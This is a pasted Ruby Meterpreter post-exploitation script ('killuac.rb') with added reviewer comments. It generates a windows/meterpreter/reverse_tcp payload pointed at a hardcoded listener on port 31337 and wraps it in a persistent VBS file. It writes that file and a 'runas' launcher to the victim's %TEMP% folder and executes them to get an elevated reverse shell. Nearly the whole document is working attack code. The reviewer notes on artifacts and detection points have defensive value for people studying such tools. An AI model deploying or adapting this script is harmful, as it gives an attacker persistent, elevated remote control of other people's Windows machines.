getcountermeasure v2 script

a guest Dec 4th, 2010 918 Never
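  # $Id: killuac.rb spudgunman $
  #
  # Meterpreter script to prompt for permissions to run in elevated mode and then call home
  # some code pulled from the persistence.rb script
  # Script by Kelly Keeton<kellykeeton [at] hotmail>
  # Version: 0.5
  #
  # Reviewer notes (behaviour visible in this listing):
  # * This is not a UAC bypass. The launcher re-runs itself through
  #   Shell.Application's ShellExecute with the "runas" verb, so Windows shows
  #   the normal consent prompt for wscript; nothing runs elevated unless the
  #   user approves it.
  # * Two .vbs files with random alphabetic names (6-13 characters) are written
  #   to %TEMP%. This script never deletes them, so they remain as artifacts.
  # * wscript is started visibly ('Hidden' => false), first un-elevated and then
  #   relaunched with a trailing " noloop" argument.
  # * Detection points: wscript.exe executing a .vbs from %TEMP%, wscript.exe
  #   launching a second wscript.exe with the "noloop" argument, and an outbound
  #   connection to the configured host and port.
  #
  # Default parameters
  #
  rhost = "192.168.254.129"
  rport = 31337
  payload = "windows/meterpreter/reverse_tcp"
  ##

  tempdir = client.fs.file.expand_path("%TEMP%")
  payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"

  # String#scan returns an Array, which is truthy even when empty, so the
  # original `unsupported if not platform` guard could never fire (and
  # `unsupported` is not defined anywhere in this listing). Test for an actual
  # match and end the script cleanly on any other platform.
  unless client.platform =~ /win32|win64/
    print_error("This version of Meterpreter is not supported with this Script!")
    raise Rex::Script::Completed
  end

  print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
  pay = client.framework.payloads.create(payload)
  pay.datastore['LHOST'] = rhost
  pay.datastore['LPORT'] = rport
  raw  = pay.generate

  # NOTE(review): :persist and :delay are handed to the VBS generator; presumably
  # the generated script restarts the payload in a loop with a 5 second pause --
  # confirm against Msf::Util::EXE.
  payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
  print_status("Payload script is #{payloadvbs.length} bytes long")

  # Launcher: with no arguments it re-invokes itself via the "runas" verb (this
  # is what raises the consent prompt); with an argument present it runs the
  # payload script through wscript. objFile/strFolder/strPath are computed but
  # never used by the launcher.
  uacvbs = "
If WScript.Arguments.length =0 Then
 Set objShell = CreateObject(\"Shell.Application\")
 objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
Else
 Set objShell = WScript.CreateObject(\"WScript.Shell\")
 Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
 strPath = Wscript.ScriptFullName
 Set objFile = objFSO.GetFile(strPath)
 strFolder = objFSO.GetParentFolderName(objFile)
 tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
 objShell.Run(tmp)
End If"

  # Writes data to a remote path and always closes the remote handle, even when
  # the write raises (the original leaked the handle on a failed write).
  write_remote = lambda do |path, data|
    fd = client.fs.file.new(path, "wb")
    begin
      fd.write(data)
    ensure
      fd.close
    end
  end

  #
  # Upload to the filesystem
  #
  elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
  print_status("UAC elevation script written to #{elevationfile}")
  write_remote.call(elevationfile, uacvbs)

  print_status("payload script written to #{payloadfile}")
  write_remote.call(payloadfile, payloadvbs)

  #
  # Execute the script
  #
  # 'Hidden' => false: the wscript process is created visibly.
  launched = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
  print_status("Script executed with PID #{launched.pid}")
  #EOF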